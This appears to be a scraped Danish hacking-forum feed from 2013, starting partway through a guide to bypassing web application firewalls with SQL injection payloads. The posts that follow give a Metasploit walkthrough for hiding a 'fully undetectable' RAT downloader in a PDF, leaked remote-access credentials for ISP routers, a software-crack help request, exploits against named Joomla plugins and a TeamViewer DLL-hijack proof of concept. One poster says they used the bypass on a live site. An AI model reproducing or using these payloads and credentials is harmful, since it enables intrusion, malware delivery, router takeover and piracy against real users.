id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()? -

Ovenstående kode vil omgå filteret. Bemærk at vi kan bruge "?like?" i stedet for "? = ?"
En anden måde at bruge inline comemnts, er når alt synes ikke at virke, kan du prøve at slå applikationens Firewall fra ved at lave en SQL-command ved brug af variabler:

Kode:
id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()? -

Ovenstående kode skulle bypass Union+select filtere selv der hvor fælles inline commands ikke kan.

4) Buffer Overflow :/ Uventet input:

En masse WAFS er skrevet i C sprog, der gør dem tilbøjelige til at flyde over eller eller handle anderledes, når det er indlæst med en masse data. Her er en WAF der gør denes arbejde korrekt, men når jeg giver en stor mængde data tillades ondsindede forspørgelser, og de besvares derved også..

Kode:
id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A?s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),use r(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26

,27,28,29,30,31,32,33,34,35,36?+

Det overstånede bypass virker.
Jeg har selv lige brugt dette mod et websted nu her.

5 ) Erstattet søgeord ( preg_replace

Nogle gange vil WAF-filteret fjerne alle forspørgelser, og nøgleord. For eksempel, lad os sige, at vi har et filter, der erstatter "union select" med hvid mellemrum.
Vi vil så kunne omgå filteret sådan her:

Kode:
id=1+UNIunionON+SeLselectECT+1,2,3?

Som du kan se , når "union select" er blevet fjernet vil vores "UNION + SELECT" tage "union select"'s plads og med succes injecte vores forespørgsel:

Kode:
UNION + SELECT +1,2,3 ?

6) Tegnsætning :

De fleste WAFs-filters vil afkode et input , men nogle Wafs kan kun afkode et input engang så på den måde kan dobbelt kodning omgå visse filtere.
Eksempler på dobbelt kodning :

Kode:
id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users?+

Når håber i har fået lidt ud af det, jeg synes selv det har været lidt svært at skrive det så alle vil få noget ud af det, men har gjort mit bedste og med hjælp fra en ven til de rigtige formuleringer synes jeg det er gået fint.

BTW Morph3s har på et tidspunkt sagt at han vil lave et tool til at omgå WAF :D

Lycia Out..

Ang. Buffer overflow

Tue, 03 Dec 2013 23:01:11 +0100

buffer overflow https://www.shellsec.pw/showthread.php?tid=1271
Fin guide! Bør alle læse! :D
JEg har nogle film som jeg engang for noget tid siden har hentet fra en admin på et andet forum jeg er meget aktiv på.
Det er et helt fordrag ang. det :D
I kan PM mig hvis i vil have dem. Det kan være lidt nemmere at se der :D

Metasploit - Backdoor en PDF fil med din server/rat

Sat, 12 Oct 2013 14:05:37 +0200

Credits til http://anonymouseverywhere.blogspot.dk/ , jeg har bare oversat guiden til Dansk!

Backfoor en PDF fil med din RAT

Inden du stater, så hav en PDF fil og din fud server/rat liggende på dit skrivebord i en mappe (forklaring i slutningen af tråd)

Download Metasploit direkte fra deres egen side her:
http://www.rapid7.com/products/metasploit/download.jsp

Gratis key til Metasploit 32bit: Q2ND-3CHX-WGCL-EPY9

Now let me explain how this exploit works. This is just a basic exploit that will open drops of a reverse_tcp meterpreter session on the victim when it's executed. Also, this exploit works while the PDF is open until it is migrated to another process.

Hvad du behøver for at fuldføre dette:
En PDF fil (kan fx være en guide eller ebook eller lign)
En FUD server (din RAT, husk det skal være 100% FUD)
Og Metasploit

Husk altid at tjek om din version af metasploit er up to date!
Og husk aldrig at skriv store bogstaver i metasploit (A,B C osv, kun a,b,c). Ellers vil der kommer errors, så bare følg tutorialen og skriv som jeg skriver.

Note:
Husk at have en PDF fil klar, og din server/rat uploaded til en filehost som supporter direkte links.

Nogle eksempler:

Kode:
http://ge.tt/  - MIN EGEN FAVORIT!

http://scan.psomasweb.org/

http://sharesend.com/ 

http://www.directlink.tv

http://www.filehold.net

http://www.dlandexe.com

http://www.wss-coding.com/upload

http://www.botz.in

http://kiwi6.com/

http://zippyshare.com/

http://drop.st/

http://filetolink.com/

http://freewayhost.net/

http://largedocument.com/

http://rghost.net/

http://dox.abv.bg/files/share

Trin 1
Først skal vi have infected vores PDF fil, før at gøre dette skal du åbne Metasploit's Console og skriv følgende:

PHP Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Trin 2
Efter du har skrevet den command, skal du strukturer filerne, ved at skrive følgende:

PHP Code:
set payload windows/download_exec

Trin 3
Nu skal du finde din PDF fils placering, og skrive følgende command:
Dette er bare et eksempel: C:/Users/Owner/Desktop/example.pdf

PHP Code:
set INFILENAME C:/Users/Owner/Desktop/example.pdf

Trin 4
Nu skal du bruge det direkte download link til din FUD server/rat, skriv følgende command:

PHP Code:
set url www.downloadminfil.nu/jegvilinfectedig

Nu du færdig!

Metasploirt vil automatisk gemme den færdig backdoored fil samme sted som du havde placeret din PDF fil. (Derfor jeg sagde det var nemmest hvis du lagde alle filerne på dit skrivebord i en mappe inden start)

Joomla Kunena Component (index.php, search parameter) SQL Injection

Mon, 07 Oct 2013 23:38:21 +0200

Joomla Kunena Component (index.php, search parameter) SQL Injection

#Google Dork: inurl:index.php?option=com_kunena&

[TUT] Hvordan du tjekker om en fil er infected og hvordan du hacker hackeren [TUT]

Tue, 01 Oct 2013 15:50:46 +0200

Okay, har du nogensinde modtaget en fil som du ikke helt vidste om var infected? Nu vil jeg vise jer en måde hvor i rent faktisk kan tjekke det ud. Det virker i hvert fald med RAT's og keyloggere.

Programmet hedder Bintext og det analyserer simpelthen koden i programmet og viser jer dele hvor i kan aflæse om der skulle være en request som sender keystrokes eller data til en e-mail og kodeord.

Her kan i downloade programmet : http://www.mcafee.com/us/downloads/free-...ntext.aspx

Programmet skulle gerne se sådan her ud.

Så du putter simpelthen bare filen ind i programmet og begynder at søge efter "e-mail","username" eller "password"

Som i kan se på billedet blev der fundet en e-mail og password.

Yousee Router

Mon, 29 Jul 2013 20:59:11 +0200

Fandt det det her for noget tid siden.

Yousee (webspeed router CG3000) fjernadgang selvom det slået fra i routeren. Virker også på andre af deres router.

Root webadgang til routern.
user: MSO pass: changeme
user: ruser pass: admin

Til den lidt sjover del, kan man også komme direkte ind i deres DOCSIS router via telnet både fra subnet, internet & lan (lan 192.168.100.1)

user: tdcktb pass: Jr1st1anKak0b

Pro Tools 9.0.2 har lige brug for det ekstra skub

Fri, 19 Jul 2013 07:37:48 +0200

Hej

Jeg kører en cracked version af PT 9.0.2 på MacOSX Snow Leopard, hvor det kører fint.
Cracket er som følger
Pro Tools.app indeholder (bl.a)
"Pro Tools" bash script
"PT" selve programmet
"crackpipe32" en form for debugger tror jeg, der laver nogle hardware breakpoints

"Pro Tools" scriptet indeholder:

Kode:
#!/bin/bash

cat << EOF | /Applications/Digidesign/Pro\ Tools/Pro\ Tools.app/Contents/MacOS/crackpipe32 /Applications/Digidesign/Pro\ Tools/Pro\ Tools.app/Contents/MacOS/PT

[A/Pro Tools]

hwbreak 0158B9F6 1

hwbreak 016D18EE 1

hwbreak 016D1FB2 1

For dem der ikke lige er super til bash betyder ovenstående: send resten af denne fils (Pro Tools) indhold til crackpipe32, som har PT som første argument.

Dvs, når jeg kører "Pro Tools" scriptet så starter Pro Tools op og spørger ikke om iLOK beskyttelse.
So far so good!

På Mountain Lion vil det dog ikke køre pga. denne fejl:

Kode:
[+] ====== the crackpipe r5 =====

Label: 'A/Pro Tools'

[.] Will hwbreak at 158b9f6 returing 1 

[.] Will hwbreak at 16d18ee returing 1 

[.] Will hwbreak at 16d1fb2 returing 1 

[+] Loaded 0 patches, 0 of them in libraries

[+] 3 hardware breakpoints set

[.] locating dyld load address

[.] load address found at 0x8fe33ff0

[.] locating thread start address

[!] FATAL could not process /usr/lib/libSystem.B.dylib. pretty bad

Som jeg ser det er crackpipe ikke kompatibel med Mountain Lions version af libSystem.B.dylib, men mit problem er at se hvad det er crackpipe32 egentlig gør, er der nogle der kan disassemble og forstå koden?

Jeg har prøvet at køre "PT" igennem gdb (debugger) og sætte "hbreak *0x0158b9f6" osv men uden effect så måske gør crackpipe noget mere end det?

Vedhæftet er bash scriptet "Pro Tools" og unix executable "crackpipe32".

Jeg har også prøvet at nuppe en libSystem.B.dylib fra Snow Leopard, men det giver en segmentation fault.

protools+crackpipe32.zip (Størrelse: 14,33 KB / Downloads: 13)

[SQLi] Joomla plugin com_ipricecalc

Thu, 18 Jul 2013 03:55:04 +0200

iprice calculator (com_ipricecalc) er et plugin til Joomla udviklet af iprice-web.ru. I de nyere versioner bliver GET parametret filter_order ikke escaped. Jeg har desvaerre ikke kunne opstoeve den gamle source, de tidligere havde, den kunne jeg ellers godt bruge.

Igen, ikke det mest udbredte plugin, men jeg havde et target, som havde det installeret.

Kode:
GET /en/?filter_order=[payload] HTTP/1.1

Host: demo.iprice-web.ru

Den saarbare kode ser saaledes ud
controllers/category.php

Kode:
$table =& JTable::getInstance('Iprice_category', 'JTable');

$filter_order        = $mainframe->getUserStateFromRequest( $context.'filter_order', 'filter_order', 'ipc.ordering',    'cmd' );

$filter_order_Dir    = $mainframe->getUserStateFromRequest( $context.'filter_order_Dir', 'filter_order_Dir',    '', 'word' );

[...]        

$table->SetQuery($filter_state,$filter_secid, $search, $filter_order, $filter_order_Dir);

tables/category.php

Kode:
function SetQuery($filter_state = "", $filter_secid = "",$search = "",$filter_order = "", $filter_order_Dir = "", $whe = "") {

    [...]

    if ($filter_order == 'ipc.ordering' || $filter_order == ''){

      $this->_orderby     = ' ORDER BY ips.ordering '.' '. $filter_order_Dir .', ipc.ordering'.' '. $filter_order_Dir;

    } else {

      $this->_orderby     = ' ORDER BY '. $filter_order .' '. $filter_order_Dir ;

    }

  }

[exploit] pgflashgallery arbitrary code execution

Wed, 17 Jul 2013 03:24:38 +0200

pgflashgallery er et Joomla/Wordpress plugin udviklet af http://www.photo-graffix.com.
Heldigvis er det her plugin ikke saerlig udbredt. Google kan dog finde nogle sider, der bruger det.

Exploit:

Kode:
POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1

Host: www.photo-graffix.com

func=add_new_option&cart_file=filename.php&global_cart_file=1&newop=[payload]

filename.php bliver lavet og indeholder den payload, der er givet med.

Vuln. code:

PHP kode:
$newop = $_POST['newop'];
$global_cart_file = $_POST['global_cart_file'];
if ($func == "add_new_option") {
  $udfile = $cart_file;
  if(file_exists($udfile)){
    $newdata = file_get_contents($udfile);
    $newdata = str_replace("&END", $newop."&END", $newdata);
  }else{
    if($global_cart_file == 1){
      $newdata = "&PG_BUY=".$newop."&END";
    }else{
      $newdata = "&PG_DESCRIPTION=&PG_RATING=&PG_TAGS=&PG_COUNT=0&PG_COMMENTS=&PG_BUY=".$newop."&END";
    }
  }
$fp = fopen($udfile, "w+");
$fw = fwrite( $fp, $newdata );
fclose( $fp );
} 

For at slette filen igen kan flg. POST request bruges:

Kode:
POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1

Host: www.photo-graffix.com

func=delete_cart_options&cart_file=filename.php&del_crtfile=1

Vuln. code:

PHP kode:
$cart_file = $_POST['cart_file'];
$coption = $_POST['coption'];
$del_crtfile = $_POST['del_crtfile'];
if ($func == "delete_cart_options") {
  $udfile = $cart_file;
  if ($del_crtfile == 1){
    (!unlink($cart_file)) ;
  }else{
    $newdata = file_get_contents($udfile);
    $newdata = str_replace($coption, "", $newdata);
    $fp = fopen($udfile, "w+");
    $fw = fwrite( $fp, $newdata );
    fclose( $fp );
  }
} 

Har kun testet Joomla sider, men er overbevist om, at samme fejl er til at finde paa WP pluginet. Alt koden er usikkert. Der kan logges paa ved at saette et GET parameter til 1, men det her var umiddelbart den stoerste fejl, der var.

TeamViwer V8.0.16642 Insecure Library Load

Sun, 24 Feb 2013 22:36:31 +0100

Ville lige dele denne exploit herinde, da det jo kunne være nogen som ville lege lidt med den. :P

1. RÅDGIVENDE INFORMATION
-----------------------
Produkt: TeamViwer V8.0.16642 Insecure Library Load
Vendor URL: http://www.teamviewer.com/fr/index.aspx
Dato fundet: 2013/02/24
Offentliggjort den: 2013/02/24

2. CREDITS
----------
Denne sårbarhed blev opdaget og undersøgt af The Black Devils
# Youtube: www.youtube.com/user/Th3BlackDevils
# Facebook: www.facebook.com / DevilsDz
# Email: mr.k4rizma @ gmail.com

3. VERSIONER PÅVIRKET
--------------------
TeamViwer V8.0.16642, kan ældre versioner blive påvirket også.


4. SÅRBARHED BESKRIVELSE
----------------------------
En Insecure Library Load sårbarhed er blevet identificeret i
TeamViwer V8.0.16642.

Programmet bruger en fast sti for at lede efter bestemte filer eller
biblioteker. Denne sti indeholder mapper, der ikke kræver speciel tillid
eller under brugerkontrol.

Ved at placere en custom version af et bibliotek i program stien,
Programmet vil indlæse den før den legitime version. Dette giver en
hacker tilladelse til at inject brugerdefineret kode, der vil blive kørt med det
privilegium programmet eller brugeren kørslen af programmet.
Følgende biblioteker kan blive kapret på denne måde:

LPK.dll
SETUPAPI.dll
SHFOLDER.dll
CLBCATQ.DLL
Secur32.dll

5. PROOF-OF-CONCEPT (Kode / Exploit)
------------------------------------

// wine gcc -Wall -shared inject.c -o SETUPAPI.dll

#include 

  

BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)

{

    if (dwReason == DLL_PROCESS_ATTACH)

    {

        MessageBox(0,"Inj3ctor","The Black Devils", 0);

    }

return TRUE;

}